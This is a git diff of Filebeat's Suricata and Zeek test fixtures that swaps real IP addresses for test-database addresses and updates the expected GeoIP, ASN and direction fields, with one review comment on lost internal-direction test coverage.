Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json index a71e2a2cf675..26e66adc2cf6 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json 
@@ -15,7 +15,7 @@ "event.dataset": "suricata.eve", "event.kind": "alert", "event.module": "suricata", - "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", + "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"81.2.69.143\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check 
returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "event.severity": 2, "event.start": "2021-01-22T22:28:38.673Z", "event.type": [ @@ -32,7 +32,7 @@ "log.offset": 0, "message": "Potentially Bad Traffic", "network.bytes": 1372, - "network.community_id": "1:/b5R3BDG/6TU2Pu+pRF8w6d1Z18=", + "network.community_id": "1:fmTf/MbjDMinU9coqCwDUc82LmA=", "network.direction": "inbound", "network.packets": 11, "network.protocol": "http", 
@@ -42,23 +42,23 @@ ], "related.ip": [ "10.31.64.240", - "52.222.141.99" + "81.2.69.143" ], "rule.category": "Potentially Bad Traffic", "rule.id": "2100498", "rule.name": "GPL ATTACK_RESPONSE id check returned root", "service.type": "suricata", - "source.address": "52.222.141.99", + "source.address": "81.2.69.143", "source.bytes": 496, - "source.geo.city_name": "Seattle", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 47.6348, - "source.geo.location.lon": -122.3451, - "source.geo.region_iso_code": "US-WA", - "source.geo.region_name": "Washington", - "source.ip": "52.222.141.99", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.mac": "00:03:2d:3f:e5:63", "source.packets": 6, "source.port": 80, diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json index 312ed45c58bb..131a0efe25b7 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json 
@@ -424,14 +424,7 @@ { "@timestamp": "2018-07-05T19:51:50.666Z", "destination.address": "17.142.164.13", - "destination.as.number": 714, - "destination.as.organization.name": "Apple Inc.", "destination.domain": "p33-btmmdns.icloud.com", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "17.142.164.13", "destination.port": 443, "event.category": [ diff --git a/x-pack/filebeat/module/zeek/connection/test/connection-json.log b/x-pack/filebeat/module/zeek/connection/test/connection-json.log index 467f28552c17..1e16feb89d4e 100644 --- a/x-pack/filebeat/module/zeek/connection/test/connection-json.log +++ b/x-pack/filebeat/module/zeek/connection/test/connection-json.log 
@@ -1,5 +1,5 @@
 {"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"4.4.2.2","id.orig_p":38341,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"175.16.199.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"67.43.156.14","id.orig_p":38341,"id.resp_h":"175.16.199.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.0.2.205","id.orig_p":3,"id.resp_h":"198.51.100.249","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]} {"ts":"2021-06-09T20:55:13.160328Z","uid":"C2KP1V3alRLoxl4JB9","id.orig_h":"10.0.2.15","id.orig_p":46408,"id.resp_h":"172.217.9.68","id.resp_p":80,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} diff --git a/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json b/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json index 611d4b41bdac..93a99b2cf564 100644 --- a/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/connection/test/connection-json.log-expected.json @@ -53,16 +53,17 @@ }, { "@timestamp": "2019-01-11T06:33:36.857Z", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 206, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "event.category": [ 
@@ -82,14 +83,14 @@ "input.type": "log", "log.offset": 398, "network.bytes": 309, - "network.community_id": "1:77KJyeznYjdDxCSKdZhW89aAaBI=", + "network.community_id": "1:u1VgTKo24ESvDqcvQvAIIngeo3c=", "network.direction": "outbound", "network.packets": 2, "network.protocol": "dns", "network.transport": "udp", "related.ip": [ - "192.168.86.167", - "8.8.8.8" + "175.16.199.1", + "192.168.86.167" ], "service.type": "zeek", "source.address": "192.168.86.167", @@ -111,16 +112,17 @@ }, { "@timestamp": "2019-01-11T06:33:37.857Z", - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 206, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "event.category": [ 
@@ -138,28 +140,27 @@ ], "fileset.name": "connection", "input.type": "log", - "log.offset": 792, + "log.offset": 797, "network.bytes": 309, - "network.community_id": "1:7pTO7SRt6R5Ms7DZet2wPuZnXSs=", + "network.community_id": "1:YqjkxL01hUV/S2OJjwnMWOg/eO8=", "network.direction": "external", "network.packets": 2, "network.protocol": "dns", "network.transport": "udp", "related.ip": [ - "4.4.2.2", - "8.8.8.8" + "175.16.199.1", + "67.43.156.14" ], "service.type": "zeek", - "source.address": "4.4.2.2", - "source.as.number": 3356, - "source.as.organization.name": "Level 3 Parent, LLC", + "source.address": "67.43.156.14", + "source.as.number": 35908, "source.bytes": 103, - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "4.4.2.2", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.packets": 1, "source.port": 38341, "tags": [ @@ -192,7 +193,7 @@ ], "fileset.name": "connection", "input.type": "log", - "log.offset": 1180, + "log.offset": 1195, "network.bytes": 107, "network.community_id": "1:gzTID87+KHoT4RFDSqb5aInTPeg=", "network.direction": "external", @@ -222,14 +223,7 @@ { "@timestamp": "2021-06-09T20:55:13.160Z", "destination.address": "172.217.9.68", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.9.68", "destination.packets": 0, "destination.port": 80, 
@@ -246,7 +240,7 @@
 ],
 "fileset.name": "connection",
 "input.type": "log",
- "log.offset": 1488,
+ "log.offset": 1503,
 "network.bytes": 0,
 "network.community_id": "1:DzqI9CYXjMSYV8VoSAHtMNfMIeU=",
 "network.direction": "outbound",
diff --git a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log
index d2110bf9fb9c..d3368f88e677 100644
--- a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log
+++ b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log
@@ -1 +1 @@
-{"ts":1507567500.423033,"uid":"CRrT7S1ccw9H6hzCR","id.orig_h":"192.168.10.31","id.orig_p":49285,"id.resp_h":"192.168.10.10","id.resp_p":445,"proto":"tcp","analyzer":"DCE_RPC","failure_reason":"Binpac exception: binpac exception: \u0026enforce violation : DCE_RPC_Header:rpc_vers"}
+{"ts":1507567500.423033,"uid":"CRrT7S1ccw9H6hzCR","id.orig_h":"192.168.10.31","id.orig_p":49285,"id.resp_h":"175.16.199.1","id.resp_p":445,"proto":"tcp","analyzer":"DCE_RPC","failure_reason":"Binpac exception: binpac exception: \u0026enforce violation : DCE_RPC_Header:rpc_vers"}
diff --git a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json
index 10e0ed1b7fc8..f608a589d564 100644
--- a/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/dpd/test/dpd-json.log-expected.json
@@ -1,8 +1,16 @@ [ { "@timestamp": "2017-10-09T16:45:00.423Z", - "destination.address": "192.168.10.10", - "destination.ip": "192.168.10.10", + "destination.address": "175.16.199.1", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.port": 445, "event.category": [ "network" @@ -18,11 +26,11 @@ "fileset.name": "dpd", "input.type": "log", "log.offset": 0, - "network.community_id": "1:b+Szw+ia464igf5e+MwW1WUzw9Y=", - "network.direction": "internal", + "network.community_id": "1:XUkl5nEW5zNKuQdXxIXv4T7Jtxg=", + "network.direction": "outbound", "network.transport": "tcp", "related.ip": [ - "192.168.10.10", + "175.16.199.1", "192.168.10.31" ], "service.type": "zeek", diff --git a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json index c5e64d5aee88..d2053c24a00e 100644 --- a/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/http/test/http-json.log-expected.json @@ -2,16 +2,6 @@ { "@timestamp": "2019-01-17T01:05:30.172Z", "destination.address": "17.253.5.203", - "destination.as.number": 6185, - "destination.as.organization.name": "Apple Inc.", - "destination.geo.city_name": "San Jose", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.3388, - "destination.geo.location.lon": -121.8914, - "destination.geo.region_iso_code": "US-CA", - "destination.geo.region_name": "California", "destination.ip": "17.253.5.203", "destination.port": 80, "event.action": "get", 
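Review bot: Replacing the private responder 192.168.10.10 with the public 175.16.199.1 in dpd-json.log flips the expected `network.direction` from `internal` to `outbound`, so this fixture no longer exercises the internal-traffic branch of the direction logic. If the intent was only to get deterministic GeoIP enrichment from the test database, consider keeping one fixture line with an RFC 1918 responder (for example the original 192.168.10.10) next to the new one so both `internal` and `outbound` stay covered. The kerberos-json.log hunk makes the same private-to-public substitution for a KDC responder; its expected output lies outside this chunk, but it probably loses the same case.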
@@ -77,16 +67,6 @@ { "@timestamp": "2019-01-17T06:36:59.757Z", "destination.address": "34.206.130.40", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "34.206.130.40", "destination.port": 80, "event.action": "get", diff --git a/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json b/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json index c22918b6f781..0cc1453d4420 100644 --- a/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/intel/test/intel-json.log-expected.json @@ -2,13 +2,6 @@ { "@timestamp": "2019-11-06T09:03:00.989Z", "destination.address": "198.41.0.4", - "destination.as.number": 20172, - "destination.as.organization.name": "VeriSign Global Registry Services", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "198.41.0.4", "destination.port": 53, "event.dataset": "zeek.intel", diff --git a/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json b/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json index 0d4aa51901f4..21f14351636d 100644 --- a/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/irc/test/irc-json.log-expected.json 
@@ -2,13 +2,8 @@ { "@timestamp": "2013-12-20T15:44:10.647Z", "destination.address": "38.229.70.20", - "destination.as.number": 23028, - "destination.as.organization.name": "Team Cymru Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, + "destination.as.number": 174, + "destination.as.organization.name": "Cogent Communications", "destination.ip": "38.229.70.20", "destination.port": 8000, "event.action": "USER", @@ -50,13 +45,8 @@ { "@timestamp": "2013-12-20T15:44:10.647Z", "destination.address": "38.229.70.20", - "destination.as.number": 23028, - "destination.as.organization.name": "Team Cymru Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, + "destination.as.number": 174, + "destination.as.organization.name": "Cogent Communications", "destination.ip": "38.229.70.20", "destination.port": 8000, "event.action": "NICK", @@ -103,13 +93,8 @@ { "@timestamp": "2013-12-20T15:44:10.706Z", "destination.address": "38.229.70.20", - "destination.as.number": 23028, - "destination.as.organization.name": "Team Cymru Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, + "destination.as.number": 174, + "destination.as.organization.name": "Cogent Communications", "destination.ip": "38.229.70.20", "destination.port": 8000, "event.action": "JOIN", diff --git a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log index bb5b2c52004d..3697678f4c5a 100644 
--- a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log
+++ b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log
@@ -1 +1 @@
-{"ts":1507565599.590346,"uid":"C56Flhb4WQBNkfMOl","id.orig_h":"192.168.10.31","id.orig_p":49242,"id.resp_h":"192.168.10.10","id.resp_p":88,"request_type":"TGS","client":"RonHD/CONTOSO.LOCAL","service":"HOST/admin-pc","success":true,"till":2136422885.0,"cipher":"aes256-cts-hmac-sha1-96","forwardable":true,"renewable":true,"cert.client_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","cert.server_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US"}
+{"ts":1507565599.590346,"uid":"C56Flhb4WQBNkfMOl","id.orig_h":"192.168.10.31","id.orig_p":49242,"id.resp_h":"175.16.199.1","id.resp_p":88,"request_type":"TGS","client":"RonHD/CONTOSO.LOCAL","service":"HOST/admin-pc","success":true,"till":2136422885.0,"cipher":"aes256-cts-hmac-sha1-96","forwardable":true,"renewable":true,"cert.client_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","cert.server_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US"}
diff --git a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json
index 38bafd606410..66a18b8af3fe 100644
--- a/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/kerberos/test/kerberos-json.log-expected.json
@@ -2,8 +2,16 @@ { "@timestamp": "2017-10-09T16:13:19.590Z", "client.address": "192.168.10.31", - "destination.address": "192.168.10.10", - "destination.ip": "192.168.10.10", + "destination.address": "175.16.199.1", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.port": 88, "event.action": "TGS", "event.category": [ @@ -22,18 +30,18 @@ "fileset.name": "kerberos", "input.type": "log", "log.offset": 0, - "network.community_id": "1:DW/lSsosl8gZ8pqO9kKMm7cZheQ=", - "network.direction": "internal", + "network.community_id": "1:b3Wq/ZUliRnevvni5Ppqi3dfzfE=", + "network.direction": "outbound", "network.protocol": "kerberos", "network.transport": "tcp", "related.ip": [ - "192.168.10.10", + "175.16.199.1", "192.168.10.31" ], "related.user": [ "RonHD" ], - "server.address": "192.168.10.10", + "server.address": "175.16.199.1", "service.type": "zeek", "source.address": "192.168.10.31", "source.ip": "192.168.10.31", diff --git a/x-pack/filebeat/module/zeek/notice/test/notice-json.log b/x-pack/filebeat/module/zeek/notice/test/notice-json.log index bac408ed58f4..06447e2e7a3c 100644 --- a/x-pack/filebeat/module/zeek/notice/test/notice-json.log +++ b/x-pack/filebeat/module/zeek/notice/test/notice-json.log 
@@ -1,2 +1,2 @@ {"ts":1320435875.879278,"note":"SSH::Password_Guessing","msg":"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).","sub":"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136","src":"172.16.238.1","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} -{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"8.42.77.171","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"216.160.83.57 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"216.160.83.57","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} diff --git a/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json b/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json index 7d804ac76db9..dcaa7b617331 100644 --- a/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json +++ b/x-pack/filebeat/module/zeek/notice/test/notice-json.log-expected.json @@ -35,16 +35,6 @@ { "@timestamp": "2019-02-28T22:36:28.426Z", "destination.address": "207.154.238.205", - "destination.as.number": 14061, - "destination.as.organization.name": "DigitalOcean, LLC", - "destination.geo.city_name": "Frankfurt am Main", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "DE", - "destination.geo.country_name": "Germany", - "destination.geo.location.lat": 50.1188, - "destination.geo.location.lon": 8.6843, - "destination.geo.region_iso_code": "DE-HE", - "destination.geo.region_name": "Hesse", "destination.ip": "207.154.238.205", "event.category": [ "intrusion_detection" 
@@ -62,28 +52,27 @@ "network.direction": "external", "related.ip": [ "207.154.238.205", - "8.42.77.171" + "216.160.83.57" ], - "rule.description": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", + "rule.description": "216.160.83.57 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", "rule.name": "Scan::Port_Scan", "service.type": "zeek", - "source.address": "8.42.77.171", - "source.as.number": 393552, - "source.as.organization.name": "Longmont Power & Communications", - "source.geo.city_name": "Longmont", + "source.address": "216.160.83.57", + "source.as.number": 209, + "source.geo.city_name": "Milton", "source.geo.continent_name": "North America", "source.geo.country_iso_code": "US", "source.geo.country_name": "United States", - "source.geo.location.lat": 40.1559, - "source.geo.location.lon": -105.1624, - "source.geo.region_iso_code": "US-CO", - "source.geo.region_name": "Colorado", - "source.ip": "8.42.77.171", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "tags": [ "zeek.notice" ], "zeek.notice.dropped": false, - "zeek.notice.msg": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", + "zeek.notice.msg": "216.160.83.57 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", "zeek.notice.note": "Scan::Port_Scan", "zeek.notice.peer_descr": "bro", "zeek.notice.sub": "remote", diff --git a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log index 9799c888dba7..5d6e00f08394 100644 --- a/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log +++ b/x-pack/filebeat/module/zeek/ntp/test/ntp-json.log 
@@ -1,2 +1,2 @@
-{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
-{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
